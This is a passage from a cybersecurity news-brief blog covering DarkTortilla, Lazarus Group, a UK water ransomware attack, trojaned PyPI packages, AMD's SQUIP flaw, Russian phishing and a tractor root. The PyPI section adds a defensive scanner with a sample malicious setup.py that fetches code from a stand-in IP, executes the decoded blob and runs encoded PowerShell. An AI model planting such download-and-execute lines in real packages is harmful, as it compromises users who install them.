DarkTortilla usually arrives via targeted malmails carrying infected attachments, often zip files and other archives, or ISO images. When the user double-clicks to open the contained document, they actually run the DarkTortilla initial loader. From there, the core component goes to work, but what it does is highly configurable, with its configuration carried in bitmap images. It will typically check whether it is running in a virtual machine or sandbox, set up registry keys so it can persist, migrate itself to the Windows %TEMP% directory, process any add-on files, and switch its execution environment to its install directory. Once this is done, it injects and executes its main payload, taking additional steps to prevent interference with its various components.

Different threat actors use DarkTortilla to deliver any of several payloads - usually remote access trojans such as AgentTesla, NanoCore and AsyncRAT, but also keystroke loggers and toolkits such as Metasploit and Cobalt Strike. Occasionally, it delivers ransomware.

It is easy to see why this trojan dropper has lived so long - it's incredibly versatile and valuable to threat actors, and its sophisticated anti-forensics and configurability represent a considerable investment which is worth maintaining.

Counter Threat Unit Research Team, DarkTortilla Malware Analysis, Secureworks, 17 August 2022. Available online at https://www.secureworks.com/research/darktortilla-malware-analysis.

Lazarus Group Chases Crypto Via Job Seekers

North Korean threat groups notoriously pursue hard currency and crypto assets in an attempt to bypass sanctions, and Lazarus Group has recently been discovered targeting fintech job seekers using an infected PDF containing information about a job opening at exchange operator Coinbase.

While the initial attacks infected Windows machines only, the latest variant also targets Mac users, with a malware payload signed using an Apple-issued developer certificate - which has probably been revoked by now.

Ilascu, Ionut, North Korean hackers use signed macOS malware to target IT job seekers, Bleeping Computer, 17 August 2022. Available online at https://www.bleepingcomputer.com/news/security/north-korean-hackers-use-signed-macos-malware-to-target-it-job-seekers/.


[ Modified: Thursday, August 18, 2022, 8:55 AM ]

by Les Bell - Wednesday, August 17, 2022, 9:30 AM


News Stories


(ISC)2 Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:

  • The Board apparently changed the process for nomination after the election was announced.
  • This change was not announced to the membership.
  • Nevertheless 85 people submitted nominations to run, but
  • The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response, Thames Water issued a statement via its website saying that it had not suffered a cyber-attack; instead, South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Check Point have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Check Point used code in its __init__.py file, run during installation, to download and execute a script which searches for and exfiltrates locally stored passwords.

The latest discoveries include 12 distinct malicious packages attributed to the same actor, which use PyInstaller to bundle a malicious application and its dependencies into a single executable distributed via the Discord content delivery network. Once run, it harvests passwords, cookies, web history and other data from the victim's browsers, which the attackers can use to pivot to other targets with the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.
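Install-time code is the common thread in these reports, and it can be triaged before a package is ever installed. The following is an added example, not code from Kaspersky, Snyk or Check Point: it parses a package's setup.py or __init__.py with the standard `ast` module, resolves import aliases, and reports calls that have no business running at install or import time, such as code execution, process spawning, network fetches and decoding of embedded Base64 blobs. The two sample sources and the URL in them are constructed, and the call list is an assumption, not a complete indicator set.

```python
"""Static triage of a Python package's install-time code.

Added example, not from Kaspersky, Snyk or Check Point. Parses setup.py or
__init__.py source with the standard `ast` module and reports calls that
should not run at install or import time. SUSPICIOUS_CALLS is an assumed,
incomplete list; MALICIOUS and BENIGN are constructed samples.
"""
import ast
from typing import Dict, List, Optional, Tuple

SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "os.system", "os.popen", "subprocess.run",
    "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "requests.post",
    "base64.b64decode", "ctypes.windll",
}

MALICIOUS = '''
from setuptools import setup
from urllib.request import urlopen
import base64, subprocess as sp

blob = urlopen("http://203.0.113.7/x").read()   # constructed URL
exec(base64.b64decode(blob))
sp.run(["powershell", "-enc", "..."])
setup(name="r2act", version="0.1")
'''

BENIGN = '''
from setuptools import setup
setup(name="hello", version="1.0", packages=["hello"])
'''


def import_aliases(tree: ast.AST) -> Dict[str, str]:
    """Map local names to the fully qualified names they were imported as."""
    aliases: Dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'a.b.c' for a Name/Attribute chain, else None (e.g. x().y)."""
    parts: List[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def resolve(name: str, aliases: Dict[str, str]) -> str:
    """Replace the leading component with its import target, if aliased."""
    head, _, rest = name.partition(".")
    if head in aliases:
        return aliases[head] + ("." + rest if rest else "")
    return name


def scan_source(src: str, filename: str = "setup.py") -> List[Tuple[int, str]]:
    """Return (line, qualified call name) for every suspicious call, sorted."""
    tree = ast.parse(src, filename=filename)
    aliases = import_aliases(tree)
    findings: List[Tuple[int, str]] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name is not None:
                qualified = resolve(name, aliases)
                if qualified in SUSPICIOUS_CALLS:
                    findings.append((node.lineno, qualified))
    return sorted(findings)
```

Run `scan_source` over the contents of setup.py and every __init__.py in a freshly downloaded sdist before `pip install` touches it. The alias resolution matters: `from urllib.request import urlopen` and `import subprocess as sp` are exactly the spellings a naive grep for `urllib.request.urlopen` misses. A finding is a reason to read the file, not proof of malice; build scripts for native extensions legitimately spawn compilers.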

Bezcershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Checkpoint Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et al., SQUIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, thinktanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshmanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEFCON attendees how to get privileged access to the CANBUS display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to their tractors' control systems, making repairs possible only via authorised dealers. It took researcher SickCodes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.


These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Wednesday, August 17, 2022, 7:42 PM ]